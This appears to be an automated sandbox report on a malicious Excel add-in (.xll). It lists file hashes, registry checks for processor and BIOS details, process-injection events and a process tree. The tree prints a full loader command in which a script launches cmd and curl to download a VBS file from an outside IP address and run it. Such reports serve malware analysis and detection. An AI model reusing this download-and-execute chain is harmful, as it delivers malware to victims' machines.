Analysis
max time kernel: 149s
max time network: 159s
platform: windows10-2004_x64
resource: win10v2004-20230915-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12-10-2023 07:01
Static task
static1
Behavioral task
behavioral1
Sample
392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23.xll
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23.xll
Resource
win10v2004-20230915-en
General
Target: 392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23.xll
Size: 50KB
MD5: d1a45948f411c02136ca98410475de52
SHA1: 86ce40651326b8a67730da4e429d1bc202d46226
SHA256: 392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
SHA512: 22f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0
SSDEEP: 1536:oUK23Jsm6Nh5wF3s8KjrtN/5TqRGiNwmU2x0X2Y:ICsNh5wF3s8KXHRTviNnAmY
Malware Config
Signatures
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
me.exe: Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation
Executes dropped EXE 1 IoCs
Processes:
PID 4020 me.exe
Loads dropped DLL 2 IoCs
Processes:
PID 4180 EXCEL.EXE (2 events)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
PID 4180 EXCEL.EXE
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
PID 4180 EXCEL.EXE (2 events)
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
PID 4180 EXCEL.EXE (10 events)
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
PID 4180 EXCEL.EXE wrote to memory of PID 4020 (procid_target 87), 2 events
PID 4020 me.exe wrote to memory of PID 2652 (procid_target 88), 2 events
PID 2652 cmd.exe wrote to memory of PID 2544 (procid_target 90), 2 events
Processes
1. C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
   "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23.xll"
   - Loads dropped DLL
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of FindShellTrayWindow
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   PID: 4180
   2. C:\Users\Public\me.exe
      C:\Users\Public\me.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\1.vbs http://5.42.77.33/QvCY2SE/123&&timeout 10&&c:\\users\\public\\1.vbs', 0); window.close();</script>"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 4020
      3. C:\Windows\System32\cmd.exe
         "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.77.33/QvCY2SE/123&&timeout 10&&c:\users\public\1.vbs
         - Suspicious use of WriteProcessMemory
         PID: 2652
         4. C:\Windows\system32\curl.exe
            C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.77.33/QvCY2SE/123
            PID: 2544
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Local\Temp\392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23.xll
Filesize: 50KB
MD5: d1a45948f411c02136ca98410475de52
SHA1: 86ce40651326b8a67730da4e429d1bc202d46226
SHA256: 392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
SHA512: 22f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0

Filesize: 14KB
MD5: 0b4340ed812dc82ce636c00fa5c9bef2
SHA1: 51c97ebe601ef079b16bcd87af827b0be5283d96
SHA256: dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512: d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045